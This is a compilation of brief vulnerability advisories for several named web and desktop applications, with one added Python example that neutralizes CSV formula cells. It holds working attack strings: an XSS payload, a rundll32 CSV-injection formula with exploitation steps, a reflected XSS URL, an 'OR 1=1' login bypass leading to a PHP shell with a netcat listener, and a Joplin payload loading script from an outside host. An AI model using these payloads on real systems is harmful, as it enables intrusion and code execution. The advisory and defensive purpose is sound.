A stored XSS vulnerability exists in the Customer Support System 1.0 application. An attacker can exploit this vulnerability by navigating to http://TARGET/customer_support/index.php?page=department_list, clicking on new Department, and adding the XSS payload into the 'description' parameter value. Browsing to the post will trigger the XSS payload.
CSV Injection (aka Excel Macro Injection or Formula Injection) exists in the Reports feature of Anuko Time Tracker v1.19.23.5311 via the User, Project and Note data fields, which are mishandled while exporting to a CSV file. To exploit this vulnerability:
1. Log in to the application, go to the 'User' module and edit the user.
2. Inject the payload *=rundll32|'URL.dll,OpenURL calc.exe'!A* in the 'Name' field.
3. Go to the 'Project' module and add a new project with the same malicious payload in the 'Name' field.
4. Go to the 'Time' module, select our created User and Project, and again enter the same payload in the 'Note' field.
5. Enter the rest of the details and click 'Submit'.
6. Now go to 'Reports', click Generate and download the CSV file.
7. Open the CSV file, allow all popups and our payload is executed (calculator is opened).
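On the export side, the fix for this class of bug is to neutralize formula-leading cells before they are written. The following is an added example, not Anuko Time Tracker's code: the column names and the export function are hypothetical, the trigger-character list follows OWASP's CSV injection guidance, and the test string is the payload quoted in the steps above.

```python
import csv
import io

# Leading characters a spreadsheet treats as the start of a formula
# (list taken from OWASP's CSV injection guidance).
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")

# Hypothetical report columns standing in for the User, Project and Note fields.
FIELDS = ["user", "project", "note", "hours"]


def neutralize_cell(value):
    """Return a value that a spreadsheet displays as text instead of evaluating."""
    # Real numbers are not attacker-controlled text; keep them so "-0.5" stays numeric.
    if isinstance(value, (int, float)) and not isinstance(value, bool):
        return value
    text = "" if value is None else str(value)
    # Some spreadsheet apps skip leading spaces, so test the stripped form.
    if text.lstrip(" ").startswith(FORMULA_TRIGGERS):
        return "'" + text  # a leading apostrophe forces text interpretation
    return text


def export_report(rows, fieldnames=FIELDS):
    """Write rows to CSV with every cell neutralized and quoted."""
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=fieldnames,
                            quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writeheader()
    for row in rows:
        writer.writerow({name: neutralize_cell(row.get(name)) for name in fieldnames})
    return buf.getvalue()


# Constructed sample data; the first row reuses the payload quoted on this page.
PAGE_PAYLOAD = "=rundll32|'URL.dll,OpenURL calc.exe'!A"
SAMPLE_ROWS = [
    {"user": PAGE_PAYLOAD, "project": PAGE_PAYLOAD, "note": PAGE_PAYLOAD, "hours": 1.5},
    {"user": "alice", "project": "intranet", "note": "  @follow-up with ops", "hours": -0.5},
]

if __name__ == "__main__":
    print(export_report(SAMPLE_ROWS))
```

The apostrophe prefix changes the stored text, so any consumer that re-imports the CSV has to strip it again; the alternative is to reject formula-leading input when the field is saved.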
The conferencing component on Mitel ShoreTel 19.46.1802.0 devices could allow an unauthenticated attacker to conduct a reflected cross-site scripting attack (XSS) via the PATH_INFO to index.php, due to insufficient validation for the time_zone object in the HOME_MEETING& page. Vulnerable payload:
/index.php/%22%20onmouseover=alert(document.domain)%20?page=HOME
The vulnerability is in the HOME_MEETINGS& page, where a time_zone dropdown object is located. Upon executing the payload, the exploit executes when the mouse is rolled over the dropdown menu object.
This script will perform an automatic login using the SQL injection "'OR 1 = 1 limit 1 #" and will create a new car in the archive, assigning a PHP file instead of the image of the car itself. This car, having "AAAAAAAAAAA" as a brand, will be the first among those displayed, and we will use the file just uploaded with a phpshell on the victim system. On the attacker machine, the user must listen with netcat (nc) on a port.
An XSS issue in Joplin for desktop v1.2.6 allows a link tag in a note to bypass the HTML filter. The payload for the exploit is <link rel=import href="data:text/html,<script>alert(XSS)</script> <script src="//brutelogic.com.br/1.js# </script>
DiskBoss v11.7.28 and its related products are vulnerable to an unquoted service path issue. Any low-privileged user can elevate their privileges using any of these services.
This vulnerability could permit executing code during startup or reboot with escalated privileges.
A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.